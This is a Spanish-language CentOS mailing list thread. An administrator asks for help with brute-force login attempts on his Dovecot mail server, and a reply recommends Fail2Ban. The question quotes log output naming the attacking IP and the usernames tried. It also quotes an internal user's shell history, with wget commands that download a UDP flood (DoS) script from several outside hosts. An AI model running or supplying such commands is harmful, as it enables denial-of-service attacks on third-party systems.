Puedes instalarte Fail2Ban que soporta Dovecot: http://wiki.dovecot.org/HowTo/Fail2Ban
Cuando detecte el número de fallos que configures en un tiempo también configurable, inserta una regla IPTables que bloquea a esa IP un tiempo que también puedes configurar. Lo puedes usar también para SSH y otros servicios. -- José María Terry Jiménez El jueves 21 de marzo de 2013 a las 16:55, Luis Alberto Roman Aguirre escribió: > Buenos días a todos de la lista: > Primero que nada les cuento la experiencia que estoy pasando con mi servidor > de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que > el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de > conectarse al dovecot especificamente ,les posteo lo que > sale...--------------------- pam_unix Begin > ------------------------ > > dovecot: > > Authentication > Failures: > > contacto > rhost=66.142.38.137 : 88 Time(s) > > teste > rhost=66.142.38.137 : 88 Time(s) > > basura > rhost=66.142.38.137 : 65 Time(s) > > renata > rhost=66.142.38.137 : 65 Time(s) > > financeiro > rhost=66.142.38.137 : 64 Time(s) > > biblioteca > rhost=66.142.38.137 : 62 Time(s) > > bodega > rhost=66.142.38.137 : 62 Time(s) > > licita > rhost=66.142.38.137 : 62 Time(s) > > clientes > rhost=66.142.38.137 : 61 Time(s) > > contabilidad > rhost=66.142.38.137 : 59 Time(s) > > estudio > rhost=66.142.38.137 : 59 Time(s) > > mrivera > rhost=66.142.38.137 : 58 Time(s) > > patricio > rhost=66.142.38.137 : 58 Time(s) > > prueba > rhost=66.142.38.137 : 58 Time(s) > > usuario > rhost=66.142.38.137 : 58 Time(s) > > turismo > rhost=66.142.38.137 : 57 Time(s) .......... ................. > ............(hay mas resgisto q no lo pongo es bastante todos salen de la > misma ip) Unknown Entries: > > check pass; > user unknown: 3901 Time(s) > Al parecer es un diccionario que prueba esos usuarios para ingresar al > dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo > detectar como y donde se ejecuta, pero si averigue que hicieron y que se > bajaron para realizar esto. > el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con > conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, > (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget > www.buble.biz/alinftp/udp.plwget (http://www.buble.biz/alinftp/udp.plwget) > www.packetstormsecurity.org/DoS/udp.plping > (http://www.packetstormsecurity.org/DoS/udp.plping) www.google.com.peps > (http://www.google.com.peps) xcd /tmpls -awpasswd mcondeexit > El detalle es que desde ese momento ya tengo el problema que les comente > lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? > espero me puedan alguna señal de como detectar de donde se ejecuta dicho > escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un > scaneo externo. > Saludos > Luis Roman > > _______________________________________________ > CentOS-es mailing list > CentOS-es@centos.org (mailto:CentOS-es@centos.org) > http://lists.centos.org/mailman/listinfo/centos-es > > _______________________________________________ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es